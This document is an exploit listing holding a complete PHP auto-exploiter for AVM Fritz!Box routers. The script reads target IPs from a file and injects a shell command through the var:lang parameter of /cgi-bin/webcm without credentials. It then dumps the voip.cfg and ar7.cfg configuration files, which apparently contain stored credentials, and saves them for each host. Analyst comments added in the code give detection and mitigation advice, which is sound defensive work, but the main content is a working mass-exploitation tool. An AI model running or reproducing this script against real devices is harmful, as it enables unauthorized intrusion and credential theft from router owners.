AVM Fritz!box Auto Exploiter

2015.01.08
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php
// Analyst summary of this listing (what the visible code does):
//   * reads one target per line from ips.txt in the working directory;
//   * sends a single GET to /cgi-bin/webcm on each target, first over HTTP and
//     then over HTTPS, with no credentials set anywhere in this code;
//   * the var:lang query parameter carries "%26" (URL-encoded '&') on both
//     sides of an allcfgconv command line, i.e. shell metacharacters inside a
//     CGI parameter;
//   * a response containing the string "voipcfg" is treated as a successful
//     configuration dump and is appended to <target>.txt together with a
//     second dump requested for ar7.cfg.
// Detection: in web, proxy or IDS logs, look for requests to /cgi-bin/webcm
// whose var:lang value contains "%26" or "allcfgconv" (the functions below use
// both literal spaces and %20, so match either encoding).
// Mitigation: keep the device on the vendor's current firmware and do not
// expose the management interface to untrusted networks. NOTE(review): the
// dumped files presumably contain stored account credentials; if a device was
// reachable and unpatched, rotate whatever secrets its configuration holds.
echo " +++++++++++++++++++++++++++++++++++++++++++++++ ++ Fritz!Box Fucker ++ ++ By ++ ++ BaD-HaCKeR-MaN ++ +++++++++++++++++++++++++++++++++++++++++++++++ ";
// No execution time limit: the loop below runs until the whole list is done.
set_time_limit(0);
// All PHP diagnostics are silenced, which also hides a missing ips.txt,
// failed regex matches and failed file writes further down.
error_reporting(0);

// func1: HTTPS variant of the voip.cfg request.
// $url is the scheme and host prefix; the return value is curl_exec()'s
// result, i.e. response headers plus body as one string, or false on failure.
function func1($url){
    $curl=curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    // The command portion is sent with literal spaces here (func3/func4 use %20).
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26");
    // '/' is a directory, not a cookie file; presumably this only switches the
    // cookie engine on and nothing is actually loaded or saved.
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
    // Certificate and host-name verification are both disabled, so any
    // certificate (including a self-signed one) is accepted.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    // Redirects are not followed; each request is given at most 15 seconds.
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    // Response headers are included in the returned string.
    curl_setopt($curl, CURLOPT_HEADER, true);
    $exec=curl_exec($curl);
    curl_close($curl);
    return $exec;
}

// func2: plain-HTTP variant of the voip.cfg request. Identical to func1 except
// that the two CURLOPT_SSL_* options are not set.
function func2($url){
    $curl=curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26");
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    curl_setopt($curl, CURLOPT_HEADER, true);
    $exec=curl_exec($curl);
    curl_close($curl);
    return $exec;
}

// func3: plain-HTTP request for ar7.cfg. Same shape as func2, but the command
// names a different file and its spaces are percent-encoded as %20.
function func3($url){
    $curl=curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20allcfgconv%20-C%20ar7%20-c%20-o%20-%20../../../../../var/flash/ar7.cfg%26");
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    curl_setopt($curl, CURLOPT_HEADER, true);
    $exec=curl_exec($curl);
    curl_close($curl);
    return $exec;
}

// func4: HTTPS request for ar7.cfg. Same URL as func3, with certificate and
// host-name verification disabled as in func1.
function func4($url){
    $curl=curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20allcfgconv%20-C%20ar7%20-c%20-o%20-%20../../../../../var/flash/ar7.cfg%26");
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    curl_setopt($curl, CURLOPT_HEADER, true);
    $exec=curl_exec($curl);
    curl_close($curl);
    return $exec;
}

// Driver: one iteration per line of ips.txt.
$FritzBoxIps = file("ips.txt");
foreach($FritzBoxIps as $FritzBoxD){
    /* preg_match_all("/\|\s[0-9].*:/" , $FritzBoxD , $FritzBox); $FritzBox = $FritzBox[0][0]; $FritzBox = str_replace("| " , "" , $FritzBox); $FritzBox = str_replace(":" , "" , $FritzBox); */
    // Two input layouts are accepted: a line containing "| " (the text between
    // "| " and the last ':' is taken as the host), or otherwise anything that
    // looks like a dotted quad. Both patterns are greedy, and $a[0][0] is read
    // without checking that a match was found.
    if(preg_match("/\|\s/" , $FritzBoxD)){
        preg_match_all("/\|\s.*\:/" , $FritzBoxD , $a);
        $FritzBox = str_replace( "| " , "" , str_replace(":" , "" , $a[0][0]));
    }else{
        preg_match_all("/[0-9].*\.[0-9].*\.[0-9].*\.[0-9]*/" , $FritzBoxD , $a);
        $FritzBox = $a[0][0];
    }
    echo "[+] Testing $FritzBox \n";
    // HTTP attempt. The case-insensitive marker "voipcfg" in the response is
    // the only success criterion.
    $FritzHTTP = func2("http://$FritzBox");
    if(eregi("voipcfg" , $FritzHTTP)){
        echo " + Success Exploit In http://$FritzBox/ \n";
        $ar7 = func3("http://$FritzBox");
        // Forensic artifact: both responses are appended to <host>.txt in the
        // working directory; the host string comes straight from ips.txt.
        $fp = fopen($FritzBox.".txt", 'a+');
        fwrite($fp, "http://$FritzBox \n\n $FritzHTTP \n\n $ar7 ");
        fclose($fp);
    }
    // HTTPS attempt. The hex escapes below decode to the same "voipcfg" marker.
    $FritzHTTPS = func1("https://$FritzBox");
    if(eregi("\x76\x6f\x69\x70\x63\x66\x67" , $FritzHTTPS)){
        echo " + Success Exploit In https://$FritzBox/ \n";
        $ar7 = func4("https://$FritzBox");
        $fp = fopen($FritzBox.".txt", 'a+');
        fwrite($fp, "\n\n https://$FritzBox \n\n $FritzHTTPS \n\n $ar7 ");
        fclose($fp);
    }
    // Hosts where neither response contained the marker are logged to
    // Not-Opened.txt. This also covers timeouts and unreachable hosts, where
    // curl_exec() returned false.
    if(!eregi("voipcfg" , $FritzHTTP) and !eregi("\x76\x6f\x69\x70\x63\x66\x67" , $FritzHTTPS)){
        $fp = fopen("Not-Opened.txt", 'a+');
        fwrite($fp, "$FritzBox \n");
        fclose($fp);
    }
}
?>

